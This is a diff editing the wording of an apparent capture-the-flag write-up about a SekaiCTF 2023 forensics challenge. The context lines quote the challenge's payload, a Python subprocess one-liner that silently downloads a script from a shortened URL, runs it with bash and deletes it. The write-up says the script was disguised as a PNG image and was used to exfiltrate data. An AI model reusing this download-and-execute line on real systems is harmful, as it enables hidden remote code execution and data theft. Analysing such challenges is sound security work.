Post

 b'__import__("subprocess").check_output("(curl -sL https://shorturl.at/fgjvU -o extract.sh && chmod +x extract.sh && bash extract.sh && rm -f extract.sh)>/dev/null 2>&1||true",shell=True)\r#1 + 2\n'

-The challenge did a command injection which downloads and executes a script called extract.sh.
+The challenge performed a command injection that downloads and executes a script called extract.sh.

 3. Decrypt the exfiltrated data

-When we navigate to the link which redirects us to https://storage.googleapis.com/sekaictf-2023/ab6a26cba39934bbe810f3718c4fa13f/kittens.png which shows us a broken PNG image.
-The owner of the script seems to disguise the script with a PNG image.
+When we navigate to the link, it redirects us to https://storage.googleapis.com/sekaictf-2023/ab6a26cba39934bbe810f3718c4fa13f/kittens.png, which shows us a broken PNG image.
+The owner of the script seems to have disguised the script as a PNG image.

 We download it and save it as extract.sh and here is the content of the script: